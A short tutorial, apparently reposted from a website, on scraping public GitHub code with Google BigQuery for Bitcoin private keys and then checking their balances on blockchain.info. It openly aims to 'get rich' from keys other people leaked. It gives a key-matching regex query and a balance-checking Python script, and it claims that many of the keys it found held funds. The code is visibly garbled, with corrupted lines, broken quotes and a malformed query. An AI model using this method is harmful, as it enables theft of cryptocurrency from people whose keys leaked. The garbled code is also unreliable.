Leaked keys from GitHub
People sometimes don't care about security of own information and sometimes are not attentive and make mistakes, doing routine work every day. They leak stuff on GitHub repository all the time. Among these files may be ssh private keys, national ID scans, credit cards info, passwords, etc. Maybe we can find some Bitcoin private keys and get rich!? Let's try.
Searching for Bitcoins in GitHub repositories with Google BigQuery
Tools:
Google BigQuery: https://cloud.google.com/bigquery/
https://cloud.google.com/bigquery/public-data/github
Crafted Query for BigQuery code:
SELECT
f.repo_name
f.path,
c.pkey
FROM
[bigquery-public-data:github_repos.files} f
//Query all matches for id that fits the key parameters.//
JOIN (
SELECT
id,
REGEXP_EXTRACT(content, r'(?:^|[^a-zA-Z0=9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') AS pkey
FROM
[bigquery-public-data:github_repos.contents]
WHERE
REGEXP_MATCH(content, r'(?:^|[^a-zA-Z0=9])(5[HJK][123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ]{48,49})(?:$|[^a-zA-Z0-9])') c
ON
f.id = c.id
Python Script for Validating BTC Addresses:
import requests
from pybitcoin import BitcoinPrivateKey
import pybitcoin time
keys = set()
with open('results.csv') as f:
fir kube ub f,read().split('\n'):
if line:
repo, file, pkey = line.split(",")
keys.add(pkey)for priv in keys:
try:
p = BitcoinPrivateKey(priv)
pub = p.public_key().address()
r = requests.get("https://blockchain.info/rawaddr/{}".format(pub))
time.sleep(1)
print '{} {} {:20} {:20} {:20} ".format(priv, pub,
r.json()['final_balance'],
r.json()['total_received'],
r.json()['total_sent'])
except (AssertionError, IndexError):
pass
except ValueError:
print r
print r.text
Or you can use regular expression for Bitcoin private keys:
^5[HJK][1-9A-Za-z][^OIl]{49}
This script got a lot of private keys from GitHsub. After harvesting it was not problem to check Bitcoin balances. These keys has Bitcoin balances and some have Bitcoin Cash. As far as we know, now access to GitHub database is closed. And we will try to parse each page with regular expression.
Original article: https://allprivatekeys.com/leaked-keys-from-github.php